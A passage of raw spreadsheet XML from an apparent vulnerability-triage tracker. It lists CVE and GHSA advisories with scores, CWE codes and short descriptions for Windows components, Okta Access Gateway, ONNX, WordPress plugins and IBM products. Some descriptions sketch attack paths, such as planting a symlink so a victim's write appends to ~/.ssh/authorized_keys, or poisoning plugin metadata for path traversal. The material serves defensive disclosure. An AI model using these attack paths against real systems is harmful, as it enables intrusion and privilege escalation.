s="5" t="inlineStr"><is><t>CVE-2026-85456</t></is></c><c r="D1571" s="5" t="n"><v>6.8</v></c><c r="E1571" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1571" s="5" t="inlineStr"><is><t>disclosure@vulncheck.com</t></is></c><c r="G1571" s="5" t="inlineStr" /><c r="H1571" s="5" t="n"><v>0.001</v></c><c r="I1571" s="5" t="inlineStr" /><c r="J1571" s="5" t="inlineStr" /><c r="K1571" s="5" t="inlineStr" /><c r="L1571" s="5" t="inlineStr" /><c r="M1571" s="5" t="inlineStr" /><c r="N1571" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1571" s="5" t="inlineStr"><is><t>2026-09-03</t></is></c><c r="P1571" s="5" t="inlineStr" /><c r="Q1571" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R1571" s="5" t="inlineStr"><is><t>MOOS-IvP through 24.8.1 fails to properly validate variable names extracted from alog files in the SplitHandler, allowing attackers to write files outside the split directory. Attackers can supply crafted alog files with backslash sequences in variable names to escape the output directory and append to arbitrary files on Windows systems.</t></is></c><c r="S1571" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85456</t></is></c></row><row r="1572"><c r="A1572" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1572" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C1572" s="5" t="inlineStr"><is><t>GHSA-486p-g8x4-77mg</t></is></c><c r="D1572" s="5" t="n"><v>6.8</v></c><c r="E1572" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1572" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G1572" s="5" t="inlineStr" /><c r="H1572" s="5" t="inlineStr" /><c r="I1572" s="5" t="inlineStr" /><c r="J1572" s="5" t="inlineStr" /><c r="K1572" s="5" t="inlineStr" /><c r="L1572" s="5" t="inlineStr"><is><t>pip:onnx</t></is></c><c r="M1572" s="5" t="inlineStr" /><c r="N1572" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O1572" s="5" t="inlineStr" /><c r="P1572" s="5" t="inlineStr" /><c r="Q1572" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R1572" s="5" t="inlineStr"><is><t>## Duplicate Advisory

This advisory has been withdrawn because it is a duplicate of GHSA-q56x-g2fj-4rj6. This link is maintained to preserve external references.

## Original Description
In ONNX before 1.21.0, the 'save_external_data' function builds the external-data file path from the model's external_data location field and opens it for writing without 'O_NOFOLLOW/O_EXCL', after a non-atomic 'os.path.isfile()' check. A local attacker with write access to the directory where a victim serializes external data can deterministically pre-plant a symlink that is being followed, causing the victim's write to append to any file the victim can write, e.g. ~/.ssh/authorized_keys, cron files, or application configs. Fixed in 1.21.0.</t></is></c><c r="S1572" s="6" t="inlineStr"><is><t>https://github.com/advisories/GHSA-486p-g8x4-77mg</t></is></c></row><row r="1573"><c r="A1573" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1573" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1573" s="5" t="inlineStr"><is><t>CVE-2026-5522</t></is></c><c r="D1573" s="5" t="n"><v>6.7</v></c><c r="E1573" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1573" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1573" s="5" t="inlineStr" /><c r="H1573" s="5" t="n"><v>0.001</v></c><c r="I1573" s="5" t="inlineStr" /><c r="J1573" s="5" t="inlineStr" /><c r="K1573" s="5" t="inlineStr" /><c r="L1573" s="5" t="inlineStr" /><c r="M1573" s="5" t="inlineStr" /><c r="N1573" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1573" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1573" s="5" t="inlineStr" /><c r="Q1573" s="5" t="inlineStr"><is><t>CWE-798</t></is></c><c r="R1573" s="5" t="inlineStr"><is><t>IBM QRadar 7.5.0 through 7.5.0 UP15 Interim Fix 005 contains hard-coded credentials, such as a password or cryptographic key, which it uses for its own inbound authentication, outbound communication to external components, or encryption of internal data.</t></is></c><c r="S1573" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-5522</t></is></c></row><row r="1574"><c r="A1574" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1574" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1574" s="5" t="inlineStr"><is><t>CVE-2026-69350</t></is></c><c r="D1574" s="5" t="n"><v>6.7</v></c><c r="E1574" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1574" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1574" s="5" t="inlineStr" /><c r="H1574" s="5" t="n"><v>0.003</v></c><c r="I1574" s="5" t="inlineStr" /><c r="J1574" s="5" t="inlineStr" /><c r="K1574" s="5" t="inlineStr" /><c r="L1574" s="5" t="inlineStr" /><c r="M1574" s="5" t="inlineStr" /><c r="N1574" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1574" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1574" s="5" t="inlineStr" /><c r="Q1574" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1574" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Overlay Filter allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1574" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69350</t></is></c></row><row r="1575"><c r="A1575" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1575" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1575" s="5" t="inlineStr"><is><t>CVE-2026-69373</t></is></c><c r="D1575" s="5" t="n"><v>6.7</v></c><c r="E1575" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1575" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1575" s="5" t="inlineStr" /><c r="H1575" s="5" t="n"><v>0.003</v></c><c r="I1575" s="5" t="inlineStr" /><c r="J1575" s="5" t="inlineStr" /><c r="K1575" s="5" t="inlineStr" /><c r="L1575" s="5" t="inlineStr" /><c r="M1575" s="5" t="inlineStr" /><c r="N1575" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1575" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1575" s="5" t="inlineStr" /><c r="Q1575" s="5" t="inlineStr"><is><t>CWE-125, CWE-190</t></is></c><c r="R1575" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows Overlay Filter allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1575" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69373</t></is></c></row><row r="1576"><c r="A1576" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1576" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1576" s="5" t="inlineStr"><is><t>CVE-2026-69449</t></is></c><c r="D1576" s="5" t="n"><v>6.7</v></c><c r="E1576" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1576" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1576" s="5" t="inlineStr" /><c r="H1576" s="5" t="n"><v>0.004</v></c><c r="I1576" s="5" t="inlineStr" /><c r="J1576" s="5" t="inlineStr" /><c r="K1576" s="5" t="inlineStr" /><c r="L1576" s="5" t="inlineStr" /><c r="M1576" s="5" t="inlineStr" /><c r="N1576" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1576" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1576" s="5" t="inlineStr" /><c r="Q1576" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1576" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows BitLocker allows an authorized attacker to execute code locally.</t></is></c><c r="S1576" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69449</t></is></c></row><row r="1577"><c r="A1577" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1577" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1577" s="5" t="inlineStr"><is><t>CVE-2026-69820</t></is></c><c r="D1577" s="5" t="n"><v>6.7</v></c><c r="E1577" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1577" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1577" s="5" t="inlineStr" /><c r="H1577" s="5" t="n"><v>0.003</v></c><c r="I1577" s="5" t="inlineStr" /><c r="J1577" s="5" t="inlineStr" /><c r="K1577" s="5" t="inlineStr"><is><t>microsoft:windows_10_21h2, microsoft:windows_10_22h2, microsoft:windows_11_23h2, microsoft:windows_11_24h2, microsoft:windows_11_25h2, microsoft:windows_11_26h1</t></is></c><c r="L1577" s="5" t="inlineStr" /><c r="M1577" s="5" t="inlineStr" /><c r="N1577" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1577" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1577" s="5" t="inlineStr" /><c r="Q1577" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1577" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Hello allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1577" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69820</t></is></c></row><row r="1578"><c r="A1578" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1578" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1578" s="5" t="inlineStr"><is><t>CVE-2026-71339</t></is></c><c r="D1578" s="5" t="n"><v>6.7</v></c><c r="E1578" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1578" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1578" s="5" t="inlineStr" /><c r="H1578" s="5" t="n"><v>0.003</v></c><c r="I1578" s="5" t="inlineStr" /><c r="J1578" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K157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578" s="5" t="inlineStr" /><c r="M1578" s="5" t="inlineStr" /><c r="N1578" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1578" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1578" s="5" t="inlineStr" /><c r="Q1578" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1578" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Windows Installer allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1578" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-71339</t></is></c></row><row r="1579"><c r="A1579" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1579" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1579" s="5" t="inlineStr"><is><t>CVE-2026-72927</t></is></c><c r="D1579" s="5" t="n"><v>6.7</v></c><c r="E1579" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1579" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1579" s="5" t="inlineStr" /><c r="H1579" s="5" t="n"><v>0.003</v></c><c r="I1579" s="5" t="inlineStr" /><c r="J1579" s="5" t="inlineStr" /><c r="K1579" s="5" t="inlineStr" /><c r="L1579" s="5" t="inlineStr" /><c r="M1579" s="5" t="inlineStr" /><c r="N1579" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1579" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1579" s="5" t="inlineStr" /><c r="Q1579" s="5" t="inlineStr"><is><t>CWE-122</t></is></c><c r="R1579" s="5" t="inlineStr"><is><t>Heap-based buffer overflow in Winsock allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1579" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72927</t></is></c></row><row r="1580"><c r="A1580" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1580" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1580" s="5" t="inlineStr"><is><t>CVE-2026-72935</t></is></c><c r="D1580" s="5" t="n"><v>6.7</v></c><c r="E1580" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1580" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1580" s="5" t="inlineStr" /><c r="H1580" s="5" t="n"><v>0.003</v></c><c r="I1580" s="5" t="inlineStr" /><c r="J1580" s="5" t="inlineStr" /><c r="K1580" s="5" t="inlineStr" /><c r="L1580" s="5" t="inlineStr" /><c r="M1580" s="5" t="inlineStr" /><c r="N1580" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1580" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1580" s="5" t="inlineStr" /><c r="Q1580" s="5" t="inlineStr"><is><t>CWE-125</t></is></c><c r="R1580" s="5" t="inlineStr"><is><t>Out-of-bounds read in Windows NTFS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1580" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72935</t></is></c></row><row r="1581"><c r="A1581" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1581" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1581" s="5" t="inlineStr"><is><t>CVE-2026-72948</t></is></c><c r="D1581" s="5" t="n"><v>6.7</v></c><c r="E1581" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1581" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1581" s="5" t="inlineStr" /><c r="H1581" s="5" t="n"><v>0.004</v></c><c r="I1581" s="5" t="inlineStr" /><c r="J1581" s="5" t="inlineStr" /><c r="K1581" s="5" t="inlineStr" /><c r="L1581" s="5" t="inlineStr" /><c r="M1581" s="5" t="inlineStr" /><c r="N1581" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1581" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1581" s="5" t="inlineStr" /><c r="Q1581" s="5" t="inlineStr"><is><t>CWE-23</t></is></c><c r="R1581" s="5" t="inlineStr"><is><t>Relative path traversal in Windows DNS allows an authorized attacker to elevate privileges locally.</t></is></c><c r="S1581" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-72948</t></is></c></row><row r="1582"><c r="A1582" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1582" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1582" s="5" t="inlineStr"><is><t>CVE-2026-78625</t></is></c><c r="D1582" s="5" t="n"><v>6.7</v></c><c r="E1582" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1582" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1582" s="5" t="inlineStr" /><c r="H1582" s="5" t="n"><v>0.002</v></c><c r="I1582" s="5" t="inlineStr" /><c r="J1582" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1582" s="5" t="inlineStr" /><c r="L1582" s="5" t="inlineStr" /><c r="M1582" s="5" t="inlineStr" /><c r="N1582" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1582" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1582" s="5" t="inlineStr" /><c r="Q1582" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R1582" s="5" t="inlineStr"><is><t>The Okta Access Gateway does not sanitize dashboard label values before writing them into generated PHP configuration files. The generated file is automatically included during authentication requests, resulting in execution with the privileges of the web server process.</t></is></c><c r="S1582" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78625</t></is></c></row><row r="1583"><c r="A1583" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1583" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1583" s="5" t="inlineStr"><is><t>CVE-2026-78630</t></is></c><c r="D1583" s="5" t="n"><v>6.7</v></c><c r="E1583" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1583" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1583" s="5" t="inlineStr" /><c r="H1583" s="5" t="n"><v>0.002</v></c><c r="I1583" s="5" t="inlineStr" /><c r="J1583" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1583" s="5" t="inlineStr" /><c r="L1583" s="5" t="inlineStr" /><c r="M1583" s="5" t="inlineStr" /><c r="N1583" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1583" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1583" s="5" t="inlineStr" /><c r="Q1583" s="5" t="inlineStr"><is><t>CWE-78</t></is></c><c r="R1583" s="5" t="inlineStr"><is><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is></c><c r="S1583" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78630</t></is></c></row><row r="1584"><c r="A1584" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1584" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1584" s="5" t="inlineStr"><is><t>CVE-2026-85981</t></is></c><c r="D1584" s="5" t="n"><v>6.7</v></c><c r="E1584" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1584" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1584" s="5" t="inlineStr" /><c r="H1584" s="5" t="n"><v>0.001</v></c><c r="I1584" s="5" t="inlineStr" /><c r="J1584" s="5" t="inlineStr" /><c r="K1584" s="5" t="inlineStr" /><c r="L1584" s="5" t="inlineStr" /><c r="M1584" s="5" t="inlineStr" /><c r="N1584" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1584" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1584" s="5" t="inlineStr" /><c r="Q1584" s="5" t="inlineStr"><is><t>CWE-306</t></is></c><c r="R1584" s="5" t="inlineStr"><is><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is></c><c r="S1584" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-85981</t></is></c></row><row r="1585"><c r="A1585" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1585" s="5" t="inlineStr"><is><t>Updated</t></is></c><c r="C1585" s="5" t="inlineStr"><is><t>CVE-2026-45819</t></is></c><c r="D1585" s="5" t="n"><v>6.6</v></c><c r="E1585" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1585" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="G1585" s="5" t="inlineStr" /><c r="H1585" s="5" t="n"><v>0.004</v></c><c r="I1585" s="5" t="inlineStr" /><c r="J1585" s="5" t="inlineStr" /><c r="K1585" s="5" t="inlineStr" /><c r="L1585" s="5" t="inlineStr"><is><t>npm:baseline-browser-mapping</t></is></c><c r="M1585" s="5" t="inlineStr"><is><t>2.11.0</t></is></c><c r="N1585" s="5" t="inlineStr"><is><t>GHSA</t></is></c><c r="O1585" s="5" t="inlineStr" /><c r="P1585" s="5" t="inlineStr" /><c r="Q1585" s="5" t="inlineStr"><is><t>CWE-705</t></is></c><c r="R1585" s="5" t="inlineStr"><is><t>baseline-browser-mapping 2.x before 2.11.0 calls process.exit() instead of throwing on invalid or conflicting input parameters, and can trigger immediate process termination, causing denial of service.</t></is></c><c r="S1585" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-45819</t></is></c></row><row r="1586"><c r="A1586" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1586" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1586" s="5" t="inlineStr"><is><t>CVE-2026-52486</t></is></c><c r="D1586" s="5" t="n"><v>6.6</v></c><c r="E1586" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1586" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1586" s="5" t="inlineStr" /><c r="H1586" s="5" t="n"><v>0.001</v></c><c r="I1586" s="5" t="inlineStr" /><c r="J1586" s="5" t="inlineStr" /><c r="K1586" s="5" t="inlineStr" /><c r="L1586" s="5" t="inlineStr" /><c r="M1586" s="5" t="inlineStr" /><c r="N1586" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1586" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1586" s="5" t="inlineStr" /><c r="Q1586" s="5" t="inlineStr"><is><t>CWE-347</t></is></c><c r="R1586" s="5" t="inlineStr"><is><t>An issue in OpenDDS 3.33.x allows a local attacker to cause a denial of service via the verify function in the SIgnedDocument module</t></is></c><c r="S1586" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-52486</t></is></c></row><row r="1587"><c r="A1587" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1587" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1587" s="5" t="inlineStr"><is><t>CVE-2026-69469</t></is></c><c r="D1587" s="5" t="n"><v>6.6</v></c><c r="E1587" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1587" s="5" t="inlineStr"><is><t>secure@microsoft.com</t></is></c><c r="G1587" s="5" t="inlineStr" /><c r="H1587" s="5" t="n"><v>0.004</v></c><c r="I1587" s="5" t="inlineStr" /><c r="J1587" s="5" t="inlineStr"><is><t>microsoft:windows_server</t></is></c><c r="K1587"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587" s="5" t="inlineStr" /><c r="M1587" s="5" t="inlineStr" /><c r="N1587" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1587" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1587" s="5" t="inlineStr" /><c r="Q1587" s="5" t="inlineStr"><is><t>CWE-122, CWE-190</t></is></c><c r="R1587" s="5" t="inlineStr"><is><t>Integer overflow or wraparound in Windows USB Audio Class driver (usbaudio.sys) allows an unauthorized attacker to elevate privileges with a physical attack.</t></is></c><c r="S1587" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-69469</t></is></c></row><row r="1588"><c r="A1588" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1588" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1588" s="5" t="inlineStr"><is><t>CVE-2026-78545</t></is></c><c r="D1588" s="5" t="n"><v>6.6</v></c><c r="E1588" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1588" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1588" s="5" t="inlineStr" /><c r="H1588" s="5" t="n"><v>0.004</v></c><c r="I1588" s="5" t="inlineStr" /><c r="J1588" s="5" t="inlineStr"><is><t>nginx, okta</t></is></c><c r="K1588" s="5" t="inlineStr" /><c r="L1588" s="5" t="inlineStr" /><c r="M1588" s="5" t="inlineStr" /><c r="N1588" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1588" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1588" s="5" t="inlineStr" /><c r="Q1588" s="5" t="inlineStr"><is><t>CWE-94</t></is></c><c r="R1588" s="5" t="inlineStr"><is><t>The Okta Access Gateway does not sanitize the application label field before including it in the generated nginx configuration file. The unsanitized value is interpolated into an nginx server block directive, resulting in execution of injected directives.</t></is></c><c r="S1588" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78545</t></is></c></row><row r="1589"><c r="A1589" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1589" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1589" s="5" t="inlineStr"><is><t>CVE-2026-78550</t></is></c><c r="D1589" s="5" t="n"><v>6.6</v></c><c r="E1589" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1589" s="5" t="inlineStr"><is><t>psirt@okta.com</t></is></c><c r="G1589" s="5" t="inlineStr" /><c r="H1589" s="5" t="n"><v>0.004</v></c><c r="I1589" s="5" t="inlineStr" /><c r="J1589" s="5" t="inlineStr"><is><t>okta</t></is></c><c r="K1589" s="5" t="inlineStr" /><c r="L1589" s="5" t="inlineStr" /><c r="M1589" s="5" t="inlineStr" /><c r="N1589" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1589" s="5" t="inlineStr"><is><t>2026-09-08</t></is></c><c r="P1589" s="5" t="inlineStr" /><c r="Q1589" s="5" t="inlineStr"><is><t>CWE-95</t></is></c><c r="R1589" s="5" t="inlineStr"><is><t>The Okta Access Gateway management console passes user-supplied input to eval() without sanitization during an authenticated administrator SSH session. As a result, the unsanitized input is executed directly, leading to code execution with the privileges of the management console.</t></is></c><c r="S1589" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-78550</t></is></c></row><row r="1590"><c r="A1590" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1590" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1590" s="5" t="inlineStr"><is><t>CVE-2026-84898</t></is></c><c r="D1590" s="5" t="n"><v>6.6</v></c><c r="E1590" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1590" s="5" t="inlineStr"><is><t>134c704f-9b21-4f2e-91b3-4a467353bcc0</t></is></c><c r="G1590" s="5" t="inlineStr" /><c r="H1590" s="5" t="n"><v>0.003</v></c><c r="I1590" s="5" t="inlineStr" /><c r="J1590" s="5" t="inlineStr" /><c r="K1590" s="5" t="inlineStr" /><c r="L1590" s="5" t="inlineStr" /><c r="M1590" s="5" t="inlineStr" /><c r="N1590" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1590" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1590" s="5" t="inlineStr" /><c r="Q1590" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R1590" s="5" t="inlineStr"><is><t>The Eventin  WordPress plugin before 4.1.21 does not properly validate a template path value before using it to include a local file, allowing users with contributor-level access and above to include and execute arbitrary local PHP files.</t></is></c><c r="S1590" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-84898</t></is></c></row><row r="1591"><c r="A1591" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1591" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1591" s="5" t="inlineStr"><is><t>CVE-2026-14975</t></is></c><c r="D1591" s="5" t="n"><v>6.5</v></c><c r="E1591" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1591" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1591" s="5" t="inlineStr" /><c r="H1591" s="5" t="n"><v>0.007</v></c><c r="I1591" s="5" t="inlineStr" /><c r="J1591" s="5" t="inlineStr" /><c r="K1591" s="5" t="inlineStr" /><c r="L1591" s="5" t="inlineStr" /><c r="M1591" s="5" t="inlineStr" /><c r="N1591" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1591" s="5" t="inlineStr"><is><t>2026-09-05</t></is></c><c r="P1591" s="5" t="inlineStr" /><c r="Q1591" s="5" t="inlineStr"><is><t>CWE-22</t></is></c><c r="R1591" s="5" t="inlineStr"><is><t>The WP File Download plugin for WordPress is vulnerable to Directory Traversal in all versions up to, and including, 6.3.8 via the 'remoteurl' parameter. This makes it possible for authenticated attackers, with subscriber-level access and above, to read the contents of arbitrary files on the server, which can contain sensitive information. An authenticated attacker with Subscriber-level access first poisons the _wpfd_file_metadata['file'] post-meta value via the unprotected file.save handler, after which the streaming endpoint — hooked on init with no authentication requirement — resolves and streams the traversed file path to any caller, including unauthenticated visitors.</t></is></c><c r="S1591" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-14975</t></is></c></row><row r="1592"><c r="A1592" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1592" s="5" t="inlineStr"><is><t>Newly scored</t></is></c><c r="C1592" s="5" t="inlineStr"><is><t>CVE-2026-17259</t></is></c><c r="D1592" s="5" t="n"><v>6.5</v></c><c r="E1592" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1592" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="G1592" s="5" t="inlineStr" /><c r="H1592" s="5" t="n"><v>0.004</v></c><c r="I1592" s="5" t="inlineStr" /><c r="J1592" s="5" t="inlineStr" /><c r="K1592" s="5" t="inlineStr"><is><t>ibm:i</t></is></c><c r="L1592" s="5" t="inlineStr" /><c r="M1592" s="5" t="inlineStr" /><c r="N1592" s="5" t="inlineStr"><is><t>NVD</t></is></c><c r="O1592" s="5" t="inlineStr"><is><t>2026-09-04</t></is></c><c r="P1592" s="5" t="inlineStr" /><c r="Q1592" s="5" t="inlineStr"><is><t>CWE-121</t></is></c><c r="R1592" s="5" t="inlineStr"><is><t>IBM i 7.6, 7.5, 7.4, and 7.3 could allow a remote authenticated attacker to cause a denial of service due to a stack-based buffer overflow.</t></is></c><c r="S1592" s="6" t="inlineStr"><is><t>https://nvd.nist.gov/vuln/detail/CVE-2026-17259</t></is></c></row><row r="1593"><c r="A1593" s="5" t="inlineStr"><is><t>P4 - Low / Unscored</t></is></c><c r="B1593" s="5" t="inlineStr"><is><t>New</t></is></c><c r="C1593" s="5" t="inlineStr"><is><t>CVE-2026-17509</t></is></c><c r="D1593" s="5" t="n"><v>6.5</v></c><c r="E1593" s="5" t="inlineStr"><is><t>MEDIUM</t></is></c><c r="F1593" s="5" t="inlineStr"><is><t>security@wordfence.com</t></is></c><c r="G1593" s="5" t="inlineStr" /><c r="H1593" s="5" 